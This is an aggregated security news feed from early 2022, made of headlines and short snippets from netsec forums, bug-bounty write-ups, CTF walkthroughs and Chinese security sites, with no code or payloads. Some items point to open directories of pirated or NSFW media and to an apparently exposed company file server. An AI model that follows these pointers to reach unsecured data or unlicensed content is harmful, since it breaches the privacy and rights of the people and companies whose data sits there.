    Solidity Audit & Ethereum Smart Contract Analysis using Mythril - Blockchain Security #2
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    Check Out the Speakers for IWCON 2022
    Register today to be a part of the coolest Cybersecurity conference of 2022!  ( 2 min )
    Hack a Linux Desktop with The Cheapest USB Rubber Ducky and The Android Terminal (Termux)
    Last time, I have written an article about making a USB Rubber Ducky with less than $3 and I did a simple test and attach how to…  ( 3 min )
    How I exposed the teacher’s Aadhaar card, bank details on the college website.
    Hey fellow hackers and Bug hunters,  ( 2 min )
    Understanding Steganography for Capture The Flag Challenges
    What is steganography? Where is it used? Steganography in CTFs  ( 3 min )
    Paytm-Broken Link Hijacking
    Hello Everyone….  ( 3 min )
    TryHackMe — Extending Your Network
    CTF info writeup  ( 4 min )
    Everyday-Cyber
    Day-1  ( 4 min )
    The Story of an RCE on a Java Web Application
    It was about two months ago (November 2021) I was invited to a private program. According to their program scope, I decided to hack them…  ( 5 min )
  • Open

    Exposing the "InFraud Organization" - An OSINT Analysis - Maltego Technical Details Video Demonstration
    Amazing! Feel like it's 2007 -- check out the slides here including the technical details here which I produced for https://whoisxmlapi.com here including the following Maltego technical details video demonstration video: Enjoy!
  • Open

    Domain Escalation – Machine Accounts
    The pass the hash technique is not new and it was usually used for lateral movement on the network in scenarios where the administrator password… Continue reading → Domain Escalation – Machine Accounts  ( 3 min )
  • Open

    RCE in Samba(CVE-2021-44142)
    Article URL: https://www.samba.org/samba/security/CVE-2021-44142.html Comments URL: https://news.ycombinator.com/item?id=30158662 Points: 3 # Comments: 0  ( 1 min )
  • Open

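    Learning V8 Exploitation from Scratch: Environment Setup (Part 1)
    Author: Hcamael@Knownsec 404 Lab For certain reasons I recently started learning V8 exploitation, so I plan to write a series of articles to record my learning process. Overview Before starting to research V8, you need an environment for the corresponding version, and there are plenty of tutorials online for setting up a V8 environment. When setting up the environment in China, for reasons everyone knows, we run into the first bottleneck: the network. That is fairly easy to solve, though: set the environment up on a VPS, where the network speed is fastest. But then we run into the second bottleneck, performance: the performance of a personal VPS is generally 1...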
  • Open

    Beginner Bug Bounty Guide - Part 5
    Previous : Beginner Bug Bounty Guide — Part 4 Continue reading on Medium »  ( 1 min )
  • Open

    TheHuzz: Instruction Fuzzing of Processors Using Golden-Reference Models
    Article URL: https://arxiv.org/abs/2201.09941 Comments URL: https://news.ycombinator.com/item?id=30156948 Points: 1 # Comments: 0  ( 2 min )

  • Open

    Analyzing Malware with Hooks, Stomps and Return-addresses
    submitted by /u/jat0369 [link] [comments]
    Don't trust comments
    submitted by /u/crower [link] [comments]
    RCE and Auth Bypass in Aqua Illumination Hydra Series Aquarium Lights
    submitted by /u/laransec [link] [comments]
    Reverse Engineering 3201: Symbolic Analysis
    submitted by /u/OpenSecurityTraining [link] [comments]
    A story of leaking uninitialized memory from Fastly
    submitted by /u/albinowax [link] [comments]  ( 1 min )
    TrendNET AC2600 RCE from the Internet
    submitted by /u/dinobyt3s [link] [comments]
  • Open

    Top Ways Websites get Hacked by Spammers
    There’s a lot that goes into a website environment in terms of functionality. Because of this, it’s only natural that one of the most commonly asked questions is how websites are usually hacked. In my previous post I talk about the Most Interesting Vulnerabilities of 2021, which should provide more insight into the more recent hacks seen, or caught beforehand. In this article we’ll be discussing the primary ways websites are infected, and how you can better prevent it from happening.  Continue reading Top Ways Websites get Hacked by Spammers at Sucuri Blog.
  • Open

    Lots of movies, TV shows, and top shelf porn
    192.64.86.228 submitted by /u/inoculatemedia [link] [comments]
    Movies, Documentaries, music, TV Series etc
    Quite a handful of TV Shows, Movies, Documentaries etc. Some content may be NSFW. ​ http://188.165.227.112/portail/ submitted by /u/amritajaatak [link] [comments]  ( 1 min )
  • Open

    Cyber Investigator OSINT CTF “Crime Scene Investigation” Writeup
    The Cyber Society at Cardiff University runs the Cyber Investigator CTF, a free CTF with OSINT, forensics, and investigation challenges. Continue reading on Medium »  ( 5 min )
    Walkthrough — Hacktoria: Geolocation 02
    After having so much fun solving Hacktoria’s Geolocation — 01 challenge yesterday, I have decided today to go for the 2nd challenge. Here… Continue reading on Medium »  ( 5 min )
    Quiztime — Random OSINT Challenge 7
    On Jan 12, 2022, Quiztime (contributor @twone2) shared a new OSINT quiz with us. The objective was simple. We had to figure out where and… Continue reading on Medium »  ( 1 min )
    What is OSINT?(Part 1): A practical introduction!
    This article was written in collaboration with the marvelous Aardwarewolf Continue reading on Medium »  ( 17 min )
    What is OSINT? (Part 1)
    A practical introduction Continue reading on Medium »  ( 16 min )
    Investigating Russian Number Plates
    Russian number plates come in a variety of shapes and sizes and can reveal interesting information regarding the owner of a target vehicle… Continue reading on Medium »  ( 3 min )
  • Open

    Multiple firewall layers - are they necessary?
    I was sitting around today pulling my hair out at the prospect of automating rulebases, objects, etc across the separate vendors we use for our edge and internal firewall. Then the question hit me - why do we even have an internal firewall? Our edge FW is a Palo capable of everything the internal FW does and then some. So why can't I simply take everything hanging off the internal FW, move it to the edge FW, and save some money while making my life much easier? The only things I can come up with that we lose are vendor diversity and physical separation. Am I crazy or missing something? If not - would I even gain anything out of VIRTUALLY splitting those firewalls via different vsys on the Palos (I imagine not)? Thanks! submitted by /u/difflx2112 [link] [comments]  ( 4 min )
    Modbus Traversal?
    My company has an air\gas utility monitor that's connected over cellular back to the utility provider for monitoring and reporting. Currently isolated from anything else. Our Facilities team want to put a modbus TCP device on it for our own internal monitoring and reporting. Anyone have experience with this sort of setup? If someone were to gain access to the utility monitor over cellular could they then utilize modbus to control and traverse our network through the modbus\TCP gateway? submitted by /u/ThePaulHarrell [link] [comments]  ( 2 min )
    Any special tips for a soon to be CISO?
    Hello, I'm about to become the CISO for a school I'm pretty confident on what I should do and what should be my first steps but I would like to know if any of you have any uncommon tips? Any good podcast/news source for example ? ​ Thanks ! submitted by /u/elminstor [link] [comments]  ( 4 min )
    Computer and phone security
    1) Thank you all for your suggestions on my former question. I'd like to ask about some ways to secure an Android phone and a Windows computer. I am specifically looking for software and/or preferred settings to block intrusions from physical and wireless access in 2 scenarios 1) Someone gets the phone/computer physically and 2) Someone accesses it wirelessly. I'd like to know what to do so the data are unreadable (Preferably encrypted) in scenario 1 while still keeping the phone/computer capable of basic functioning and so the phone/computer is harder to get into for attackers in (or before) scenario 2. Let's assume both devices are up-to-date with antivirus and firewall (When applicable). I'd like to know the best method even if it means going around some hidden functions of the devices submitted by /u/O-0111 [link] [comments]  ( 1 min )
    Descriptive logic in Mobile Security
    Hi everyone! I'm a cybersecurity student and want to ask a slightly "stupid" question. In my program, there is a subject "Mobile security" where I was given the task to read a descriptive logic book of 500+ pages. So I wanted to ask, what does descriptive logic have to do with Mobile Security? Do you need to know and study this science to ensure the security of an application? submitted by /u/_hanabi_n [link] [comments]  ( 1 min )
    [MFA] Could a managed laptop count as a possession factor?
    Hi, I am supposed to secure a remote connection of company laptops with two factors. The devices are managed by Intune with conditional access. You need a company managed device to connect to the company network. Do you think that per definition the managed device with conditional access could count as a possession factor in a multi-factor authentication? Wikipedia says about the possession factor Possession factors ("something only the user has") have been used for authentication for centuries, in the form of a key to a lock. The basic principle is that the key embodies a secret that is shared between the lock and the key, and the same principle underlies possession factor authentication in computer systems. A security token is an example of a possession factor. One could argue that the device itself could count as a possession. It's not personalized but you still require one device out of a few hundred and one set of credentials to establish a connection. submitted by /u/Vertripper [link] [comments]  ( 4 min )
    Discovered IDOR vuln that reveal vaccination records
    Hello NetSec, Upon receiving my vaccination record, I discovered that I was able to retrieve other vaccination records along with other patient data by simply incrementing URL values. Worst part is that you can retrieve these records without being authenticated. The application initially authenticates patients to retrieve the records, but I found out you can reach the URL without being authenticated. Looking for suggestions to responsibly disclose this issue to the laboratory. I'm sure this is a violation of HIPAA. submitted by /u/nocmd [link] [comments]  ( 2 min )
    Career advice request
    I’m currently a web application developer going on 10 years now. I also have 7 years in systems and network administration. I’ve always wanted to get into cybersecurity, but with so many roles out there, most asking for several years in security, I’m not sure what I’m actually qualified for. Over the years my networking knowledge and muscle memory have depleted, and perhaps feeling a bit imposter syndromey. The last server OS I supported was Windows Server 2003 so you could say I’m not up to speed on latest tech in the greater IT sphere. Also, I’m in my early 40s if that matters at all. Just looking for some general advice as to what, if anything, I should target my job search around. I’m definitely up to refresh/update my current skills with courses or whatever providing it makes sense to even pursue at this stage in my career. Thanks in advance. submitted by /u/zushazero [link] [comments]  ( 1 min )
  • Open

    How I approached Dependency Confusion!
    Hi People, In this blog, I will be sharing my approach for finding Dependency Confusion bugs. Continue reading on Medium »  ( 1 min )
    XSS Discovery and Exploitation With BurpSuite
    I’ve recently completed TryHackMe’s cross-site-scripting room and PortSwigger’s XSS labs and here’s what I’ve learned! This piece assumes… Continue reading on Medium »  ( 4 min )
    rDEX Bug Bounty
    Overview Continue reading on Medium »  ( 3 min )
    Vulnerability Capstone — Tryhackme
    Vulnerability Researching Continue reading on Medium »  ( 1 min )
    How I was able to buy a product for free — $$$
    Hi everyone, I hope you are good. It’s been a long time since I last wrote. So in this article I will share about my finding.. Continue reading on Medium »  ( 1 min )
    How I Found A Simple Stored XSS
    This is the story of how I found my first Stored XSS (“Cross Site Scripting”) vulnerability in a bug bounty program and a walk through on… Continue reading on Medium »  ( 3 min )
  • Open

    SecWiki News 2022-01-31 Review
    SecWiki Weekly (Issue 413) by ourren; Challenges and Opportunities in Misconfiguration Injection Testing by ourren. For more recent articles, visit SecWiki  ( 2 min )
  • Open

    Vulnerability in PostBus public transport platform exposed customer data
    Article URL: https://portswigger.net/daily-swig/vulnerability-in-postbus-public-transport-platform-exposed-customer-data Comments URL: https://news.ycombinator.com/item?id=30147933 Points: 1 # Comments: 0  ( 3 min )
    Inspector-gadget: exploit for a vulnerability in the Linux USB Gadget
    Article URL: https://github.com/szymonh/inspector-gadget Comments URL: https://news.ycombinator.com/item?id=30146403 Points: 2 # Comments: 0  ( 5 min )
  • Open

    Puzzling RDP Cache - Putting the Pieces Together
    Good morning, It’s time for a new 13Cubed episode! Let's take a look at an easier way to reassemble RDP bitmap cache. And, if you're a little rusty on where to find the cache and how to export it, we'll cover that too! Episode: https://www.youtube.com/watch?v=9P845AMjJF0 Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]  ( 1 min )
    Failed GNFA, looking for tips and any advice for learning in a better way
    Just failed my GNFA and I feel really bad. Can anyone help me out with a mental boost by advising how I could be better on the next go? submitted by /u/xray_icon [link] [comments]  ( 3 min )
  • Open

    First Time Hacking The Cloud
    What’s going on hacker folks, this is shellbreak back again with another blog post, but this time, it will be about how I found my first… Continue reading on Medium »  ( 2 min )
  • Open

    Glamour model shares income from racy OnlyFans clips to help veterans, and reveals her big dream
    Daily Star reports on คามี่ สเตรลล่า, a standout star on the adult platform OnlyFans, who has revealed her dream for the future… Continue reading on Medium »

  • Open

    Archive of software for the Tandy Radio Shack - TRS-80 Model III
    http://cpmarchives.classiccmp.org/trs80/Software/Model%20III/ circa 1979 submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
    PDFs on Food science
    PDFs on Food safety, handling, manufacturing, storage, processing etc... http://154.68.126.6/library/Food%20Science%20books/ submitted by /u/amritajaatak [link] [comments]
    Some Engineering Company website Back end
    Appears to be the back end FTP server of an engineering company website. No clue if it's any useful or not. Maybe it is? https://elsmar.com/pdf_files/ submitted by /u/amritajaatak [link] [comments]  ( 1 min )
    Some ODs doesn't show up in Reddit search but when trying to post, it says that it have been posted by someone?
    Lets take this NSFW OD for example: https://pmagazine.co/wp-content/uploads/ One result show up if I search for the domain. I decided to try to post it anyway since the URL he posted doesn't work anymore. When I tried to post there's a message about a duplicate post from a totally different user with the same URL. Why didn't that one show up when searching for "pmagazine"? There should be at least 2 results but only 1 is showing. submitted by /u/Boobalizer [link] [comments]  ( 1 min )
    Tranny hardcore videos (NSFW. Not my thing but who am I to judge)
    submitted by /u/Boobalizer [link] [comments]
  • Open

    Building Custom Empire Modules
    submitted by /u/DLLCoolJ [link] [comments]
  • Open

    How do you get open-source releases of vulnerabilities and other cyber threat news?
    It seems like Twitter is the answer, but I'm curious if I'm missing some sort of centralized hub for this kind of information that is free of unimportant information. What do you personally use? submitted by /u/Hymnosi [link] [comments]  ( 1 min )
    Can you "DDOS" someone through their public IP without being connected to each other in any way?
    A friend came up to me and told me that someone was "DDOSing" him. He said he got his computer IP from a video game server and he "DDOsed" him. How could he tell? He said he noticed packet loss and he had a higher ping and it disconnected him from Discord or something, they were in a call the whole time when it happened. My friend changed his PC public IP with some Windows settings after that. Now my friend believes that this guy is some big brain hacker and I can't convince him he is not, I don't want him to believe that this guy is in control of his security. Would also love to know what exactly happened and what this script kiddie could've. submitted by /u/AnnoyingN-wah [link] [comments]  ( 2 min )
    What's the best way to secure 1) An Android phone 2) A Windows PC and 3) Home and company network?
    Hello! I'd like to know 1) how to secure an Android phone (even if it means gaining root access) while keeping basic usability 2) How to secure a Windows computer against outside attacks (also while keeping basic functionality) 3) How to secure a home and company network against attacks and data leaks submitted by /u/O-0111 [link] [comments]  ( 2 min )
    [Serious] How Fast would Quantum Computers Crack Passwords/Tokens/Logins?
    From this video I watched from my Youtube feed, I'm aware of that quantum computers would be extremely fast in computing speed, but how fast would they be able to crack things that are say: Passwords 20, 50, 100 random-characters long with just ASCII input Passwords 20, 50, 100 random-characters long that utilize ASCII, Unicode, and non-standard characters The two same concepts above, but with random words like "water", "trampoline", etc. dropped randomly into the passphrases so it's just not jumbled, and requires a full dictionary of words to crack. Randomized session-login tokens, like used for Discord, Google, browser cookies in general. Weak, typical username + password combinations used for things like social media where both are shorter than 10 characters generally. Edit: T…  ( 5 min )
  • Open

    Intro to Embedded RE Part 3: UART Discovery and Firmware Extraction via UBoot
    submitted by /u/wrongbaud [link] [comments]  ( 1 min )
    CVE-2022-0329 and the problems with automated vulnerability management
    submitted by /u/Most-Loss5834 [link] [comments]  ( 3 min )
  • Open

    How to find locations to check for Russian military build-up?
    Methods for Investigating where Russian troops accumulated along Ukraine border Continue reading on Medium »  ( 4 min )
    Walkthrough —Hacktoria: Geolocation 01
    I came across the Hacktoria website today whilst looking for OSINT information. If you navigate to “Practice” — “Geolocation” you’ll come… Continue reading on Medium »  ( 3 min )
    Why we must nurture positive ethics in “citizen-driven” OSINT
    As citizen-driven open source intelligence (OSINT) grows in popularity, so does the risk of techniques being used by bad actors. I outline… Continue reading on Medium »
  • Open

    Spare GCFA Practice
    Hey all Anyone here have a spare GCFA practice they could wing this way ? Despite multiple content run throughs and a comprehensive index, I flunked both my practice exams :S Second fail was surprising as I felt confident ! 2 weeks left now until the real thing so hoping some more turbo study and another practice may boost the confidence. Cheers ! submitted by /u/Gumps903 [link] [comments]  ( 1 min )
    Do the SANS Live Classes just reuse the slides from the book or do they have other slides to use during class time?
    Thanks! submitted by /u/curiousgal1996 [link] [comments]  ( 1 min )
    Recover Historical Firewall Logs
    Hi all, This relates to a computer running Windows 10 home. Several months ago a program made a request to make an outbound connection. This request was probably blocked by the default firewall. I would like to note any info about this request, particularly the date and time, but firewall logging was off. Is there somewhere else this would be stored? Thank you, and I'm sorry if this is the wrong forum for this. submitted by /u/KoosOomakey [link] [comments]  ( 1 min )
  • Open

    My Bug Bounty Adventure -2-
    Greetings everyone from the Promentorium bosporium. Continue reading on Medium »  ( 2 min )
    DARPA’s quest for the (almost) unhackable
    Welcome to Changelog by README! I’m your host, Blake Sobczak. Every Sunday, I’ll deliver cybersecurity news and analysis to your inbox… Continue reading on README_ »  ( 4 min )
    How I hacked my way to the top of DARPA’s hardware bug bounty
    Go inside one of the most technically challenging bug bounties ever with the researcher who subverted secure hardware designed by MIT and… Continue reading on README_ »  ( 9 min )
    How i exposed the teacher’s Aadhaar card,bank details in the college website.
    Hey fellow hackers and Bug hunters, Continue reading on InfoSec Write-ups »  ( 1 min )
    All About CSRF Flaw
    Continue reading on InfoSec Write-ups »  ( 2 min )
    Docker: From a beginner's perspective
    Docker is actually a docker engine that is used to create containers. Containers can be considered as VMs, but these VMs don’t have any… Continue reading on Medium »  ( 6 min )
    Price Tampering | Buying T-Shirts at 2 INR
    Hello Weirdos!!! Today I am going to share a write-up on a weird price tampering vulnerability I found a few months ago(currently patched). Continue reading on Medium »  ( 2 min )
    PORTSWIGGER WEB SECURITY - OS COMMAND INJECTION LAB SOLUTIONS
    OS Command Injection allows an attacker to run arbitrary operating system (OS) commands on a web application server and the application… Continue reading on Medium »  ( 4 min )
    How to get started hacking django applications
    Django is a python based web framework. In this writeup, i will teach you how to analyze django based applications . For this writeup, i… Continue reading on Medium »  ( 4 min )
  • Open

    Critical full compromise of jarvis-new.urbanclap.com via weak session signing
    Urban Company disclosed a bug submitted by ian: https://hackerone.com/reports/1380121 - Bounty: $1500
    No character limit in password field
    UPchieve disclosed a bug submitted by tomyway: https://hackerone.com/reports/1462175
  • Open

    Linux Privilege Escalation: Polkit (CVE 2021-3560)
    Introduction According to Red Hat, “Polkit stands for PolicyKit which is a framework that provides an authorization API used by privileged programs.” Pkexec is a The post Linux Privilege Escalation: Polkit (CVE 2021-3560) appeared first on Hacking Articles.  ( 7 min )
  • Open

    SecWiki News 2022-01-30 Review
    Threat Scenario Analysis Framework by ourren; wJa (D&S&I)AST tool by ourren. For more recent articles, visit SecWiki  ( 2 min )
  • Open

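    EISS-2021: Building a Multi-Layered Defense System, Based on the Zero-Trust Journey of a Large Internet Company
    Note: this talk was publicly presented at EISS-2021.
    INSEC-2020: Infrastructure Security in Large Enterprises
    Note: this talk was publicly presented at INSEC-2020.
    CTIC-2020: Practice and Reflections on Cloud Attack and Defense
    Note: this talk was publicly presented at CTIC-2020.
    BCS-2020: Using Offense to Drive Defense: Building Defenses from the Attacker's Perspective
    Note: this talk was publicly presented at BCS-2020.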
  • Open

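    Cyberspace Administration of China publishes security certification and testing results for critical network equipment and dedicated cybersecurity products
    On January 29, the official website of the Office of the Central Cyberspace Affairs Commission published Announcement No. 1 of 2022, "Announcement on the Unified Release of Security Certification and Security Testing Results for Critical Network Equipment and Dedicated Cybersecurity Products".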

  • Open

    JAVA ON EARTH [KNIGHT-CTF]
    Given Data: Continue reading on Medium »  ( 2 min )
    The Time Machine — Weaponizing WaybackUrls for Recon, BugBounties , OSINT, Sensitive Endpoints and…
    You must have heard about time travel in movies, series and comics. Well here we are Nah i’m not joking you can travel back in time and… Continue reading on Medium »  ( 3 min )
    xeuldoc: Fetch information about any public Google document
    Introduction Continue reading on Medium »  ( 1 min )
    Basic OSINT course
    Basic OSINT course — web searches for beginners — syllabus Continue reading on Medium »  ( 1 min )
    Finding the author of an illustration
    A while ago I spotted an image on reddit that really struck with me. I immediately knew I wanted to use it as my profile picture… Continue reading on Medium »  ( 2 min )
    In the beginning there was a tweet
    For the past year and a half I have been very interested in a career change into the cyber security and ethical hacking industry. I have… Continue reading on Medium »  ( 1 min )
    Quiztime — Random OSINT Challenge 6
    On Jan 13, 2022, Quiztime (contributor @N_Waters89) shared a new OSINT quiz with us. The objective simple. We had to figure out where and w Continue reading on Medium »  ( 2 min )
  • Open

    Windows vulnerability with new public exploits lets you become admin
    Article URL: https://www.bleepingcomputer.com/news/microsoft/windows-vulnerability-with-new-public-exploits-lets-you-become-admin/ Comments URL: https://news.ycombinator.com/item?id=30130902 Points: 7 # Comments: 0  ( 4 min )
    CVE-2022-0329 and the problems with automated vulnerability management
    Article URL: https://tomforb.es/cve-2022-0329-and-the-problems-with-automated-vulnerability-management/ Comments URL: https://news.ycombinator.com/item?id=30128872 Points: 9 # Comments: 4  ( 2 min )
    NMAP Vulnerability Scanning Scripts
    Article URL: https://github.com/nccgroup/nmap-nse-vulnerability-scripts Comments URL: https://news.ycombinator.com/item?id=30122224 Points: 2 # Comments: 0  ( 1 min )
  • Open

    GitHub: The Red-Teamer’s Cheat-Sheet
    It’s no secret that GitHub has become one of the main information resources for red-team reconnaissance. I mean, why bother with complex… Continue reading on Medium »  ( 3 min )
    How To Handle Security Due Diligence During The M&A Process
    More often than not, we see our clients show interest in other companies. This pull can come in many different forms, but it’s usually… Continue reading on Medium »  ( 2 min )
  • Open

    How I Made +$16,500 Hacking CDN Caching Servers — Part 3
    @bxmbn Continue reading on Medium »  ( 1 min )
    How I Made +$16,500 Hacking CDN Caching Servers — Part 2
    @bxmbn Continue reading on Medium »  ( 1 min )
    How I Made $15,000+ By Hacking Caching Servers — Part 1
    @bxmbn Continue reading on Medium »  ( 1 min )
    A Summary of OAuth 2.0 Attack Methods
    The attacker grabs the authentication request to construct a malicious URL and deceives the logged-in user of the server to click it. Continue reading on Medium »  ( 2 min )
    TrustRecruit — BUG BOUNTY
    TrustRecruit will be allocating 750,000 TRT of the total supply of $TRT tokens to successful bounty hunters. Continue reading on Medium »  ( 2 min )
    2fa Bypass by changing Request method to DELETE
    Hello Everyone My name is Arth Bajpai, I’m from Lucknow, India, and I’m back with my third write-up about a 2fa Bypass which I Found a… Continue reading on Medium »  ( 3 min )
    My First Bug is P1 in Just 3 Minute
    Hello Hacker’s and Security Guys that is My first article on how to find a P1 bug Continue reading on Medium »  ( 1 min )
  • Open

    Some lingerie photos NSFW (among other more boring stuff)
    submitted by /u/Boobalizer [link] [comments]
    PS3 sound files from games - Nicely sorted (Good speed. ~11 MB/s.)
    submitted by /u/Boobalizer [link] [comments]  ( 1 min )
  • Open

    Misconfiguration in build environment allows DLL preloading attack
    Monero disclosed a bug submitted by nim4: https://hackerone.com/reports/896338
    XSS via X-Forwarded-Host header
    Omise disclosed a bug submitted by oblivionlight: https://hackerone.com/reports/1392935 - Bounty: $200
  • Open

    How did my hosting service change my interface config?
    Hello AskNetsec, I got a VPS on a hosting service with Ubuntu on it and I closed all the ports, changed the default SSH port and changed the root and default user passwords. Then I asked my hosting service to change my public IP address. After that I saw my /etc/network/interfaces config changed... how did they do that? There is nothing even in the history :\ Any info on how they did it is appreciated. Thanks! submitted by /u/g0g0gaga [link] [comments]  ( 1 min )
    How are you guys using IOCs in your SIEM environment?
    Hey everyone! I was curious how everyone is using IOCs in their SIEM environments. We are currently focusing on TTP’s but would love to have the ability to compare our logs against known positive IOCs. We are currently only using them in our EDR solution but not our SIEM. How are you guys using them in the SIEM platform? submitted by /u/RedNeckHutch [link] [comments]  ( 2 min )
    Just finished my first week of training in SOC. Anyone here familiar with MAStermind? Looking for resources to study over the weekend.
    SOC training has been so cool. The access I have is nuts. submitted by /u/ShittyF00dPorn [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-29 Review
    No news updates today. For more recent articles, visit SecWiki  ( 2 min )
  • Open

    Five Hacking Tips - Pkexec Linux Priv. Escalation
    submitted by /u/sysrisk [link] [comments]
  • Open

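    FreeBuf Morning News | Finnish diplomats' devices infected with Pegasus spyware; US revokes Chinese telecom company's license on national security grounds
    According to foreign media reports, the US Federal Communications Commission (FCC) has revoked the license of China Unicom Americas, citing "serious national security concerns".  ( 1 min )
    Packer? Evasion? "Transparent Tribe" is seeking a new way forward for CrimsonRAT
    The Transparent Tribe group mainly targets the Indian government, military, or related organizations, as well as militants and civil society in Pakistan.  ( 1 min )
    Social Responsibility | Tophant's "FUN心" approach in 2021
    Embracing the mission, fulfilling responsibility
    Writing an online arsenal based on RestTemplate
    Using Springboot RestTemplate for automated tool development to achieve real team collaboration.  ( 2 min )
    On Industrial Cyber Ranges (Part 8) | An Overview of Industrial Cyber Ranges Abroad
    This article turns to other countries and briefly surveys the development of industrial cyber ranges abroad.  ( 1 min )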

  • Open

    North Korea's Lazarus APT leverages Windows Update client, GitHub in latest campaign
    submitted by /u/dmchell [link] [comments]
  • Open

    Detecting and mitigating CVE-2021-4034: “Pwnkit” local privilege escalation
    submitted by /u/MiguelHzBz [link] [comments]  ( 1 min )
    How to Analyze RTF Template Injection Attacks
    submitted by /u/ogunal00 [link] [comments]
    Pivoting with SSH Tunnels and Plink
    submitted by /u/m_edmondson [link] [comments]
    Rip Raw - A tool to analyse the memory of compromised Linux systems.
    submitted by /u/0x636f6f6c [link] [comments]
    Stop Storing Secrets In Environment Variables!
    submitted by /u/alxjsn [link] [comments]  ( 3 min )
    ROP Chaining: Return Oriented Programming (study notes, tutorial)
    submitted by /u/Kondencuotaspienas [link] [comments]
    "Stratus Red Team": open-source adversary emulation for AWS
    submitted by /u/thorn42 [link] [comments]
    The Cookies Parasite - Bypassing MFA with cookie theft
    submitted by /u/amirshk [link] [comments]
  • Open

    CTF Walkthrough | TryHackMe | Freshly
    Can you root this Wordpress style, SQL injection vulnerable machine? This CTF is about SQL Injection and Wordpress hacking. Developers… Continue reading on Medium »  ( 4 min )
  • Open

    Fixing the Linux Kernel Vulnerability Cve-2022-0185
    Article URL: https://blog.accuknox.com/how-to-protect-from-cve-2022-0185-using-accuknox-opensource-tools/ Comments URL: https://news.ycombinator.com/item?id=30120314 Points: 1 # Comments: 0  ( 6 min )
    RHSB-2022-001 Polkit Privilege Escalation – (CVE-2021-4034)
    Article URL: https://access.redhat.com/security/vulnerabilities/RHSB-2022-001 Comments URL: https://news.ycombinator.com/item?id=30113422 Points: 1 # Comments: 0  ( 10 min )
  • Open

    The Importance of Responsible Disclosure
    In my years as a security analyst I have worked with many clients who were in very dire straits. A website compromise is never a pleasant experience but there are a number of cases that stick out in my mind as particularly memorable: The ecommerce website owner whose business was on the brink of disaster after having to pay thousands of dollars in fines to Visa due to the presence of a credit card skimmer. Continue reading The Importance of Responsible Disclosure at Sucuri Blog.
  • Open

    A bunch of movie scripts
    submitted by /u/theg721 [link] [comments]  ( 1 min )
    words
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    horse food
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Russian and European rocket launch videos - Broadcast quality
    http://tvdownload.esa.int/ submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
    Magnetometer datasets from various space missions
    https://pds-ppi.igpp.ucla.edu/data/ The Planetary Plasma Interactions (PPI) Node of the Planetary Data System (PDS) archives and distributes digital data related to the study of the interaction between the solar wind and planetary winds with planetary magnetospheres, ionospheres and surfaces. The PPI Node is located at the Department of Earth, Planetary, and Space Sciences at the University of California, Los Angeles (UCLA). submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-28 Review
    CodeQL: Advanced by ourren; How to Get Started with ICS Vulnerability Hunting by ourren. For more recent articles, visit SecWiki  ( 2 min )
  • Open

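    Summary of key points from the DC series target machines
    This article summarizes the tools, commands, and privilege-escalation techniques used across the nine DC series target machines.  ( 1 min )
    VulnHub DC-9 target machine: detailed penetration walkthrough
    A very detailed walkthrough of the DC-9 target.  ( 1 min )
    VulnHub DC-8 target machine: detailed penetration walkthrough
    A very detailed walkthrough of the DC-8 target.  ( 1 min )
    VulnHub DC-7 target machine: detailed penetration walkthrough
    Very detailed walkthrough notes for the DC-7 target.  ( 1 min )
    FreeBuf Morning News | EU issues ultimatum to WhatsApp; North Korea's critical services suspected of being hit by DDoS attack
    The European Commission announced that WhatsApp must clarify, within one month, some recent changes to its terms of service and privacy policy to ensure compliance with EU consumer protection law.  ( 1 min )
    Cyberspace Administration of China releases the "Provisions on the Administration of Deep Synthesis in Internet Information Services (Draft for Comment)"
    The draft has twenty-five articles in total. It sets out regulatory requirements for generative and synthesis algorithms and for producing audio and video content using new technologies and applications such as deep learning and virtual reality, further clarifies and details the application scenarios of deep synthesis technology, and specifies the information security obligations of deep synthesis service providers and users.
    10 useful free data recovery tools for 2022
    10 useful free data recovery tools for 2022  ( 1 min )
    CVE-2021-4034 Linux Polkit privilege escalation: an explanation of the vulnerability discovery approach
    One article that walks you through the whole process of discovering the CVE-2021-4034 vulnerability.  ( 1 min )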
  • Open

    Paytm-Broken Link Hijacking
    Hello Everyone…. Continue reading on InfoSec Write-ups »  ( 2 min )
    TEJAS PANCHAL ONE OF THE YOUNGEST CYBER SECURITY EXPERT.
    We welcome increasingly more potent online vulnerabilities as we go into a digitized future with advanced information technology shaping… Continue reading on Medium »  ( 1 min )
    OpenLeverage Partners with Code4rena for Audit Contest to Enhance Security Measures
    Since our inception, OpenLeverage has been committed to developing a permissionless lending and margin trading protocol with aggregated… Continue reading on Medium »  ( 2 min )
  • Open

    Exposing A Portfolio of Shadow Crew Cybercrime-Friendly Forum Communities IM Screen Names - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of IM screen names from the infamous Shadow Crew cybercrime-friendly forum community part of a currently ongoing Technical Collection campaign for the purpose of assisting everyone in their cyber attack and cyber threat actor profiling campaigns. Sample Shadow Crew cybercrime-friendly forum community IM screen names: …
    Exposing A Portfolio of Shadow Crew Cybercrime-Friendly Forum Communities ICQ UINs - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of IM screen names from the infamous Shadow Crew cybercrime-friendly forum community part of a currently ongoing Technical Collection campaign for the purpose of assisting everyone in their cyber attack and cyber threat actor profiling campaigns. Sample Shadow Crew cybercrime-friendly forum community ICQ UINs: … Stay tuned!
    Exposing A Portfolio of Shadow Crew Cybercrime-Friendly Forum Communities Personal Email Address Accounts - An OSINT Analysis
    Dear blog readers, I've decided to share with everyone a currently active portfolio of IM screen names from the infamous Shadow Crew cybercrime-friendly forum community part of a currently ongoing Technical Collection campaign for the purpose of assisting everyone in their cyber attack and cyber threat actor profiling campaigns. Sample Shadow Crew cybercrime-friendly forum community personal email address accounts: …
    Exposing A Portfolio of Shadow Crew Cybercrime-Friendly Forum Communities IP Addresses - An OSINT Analysis
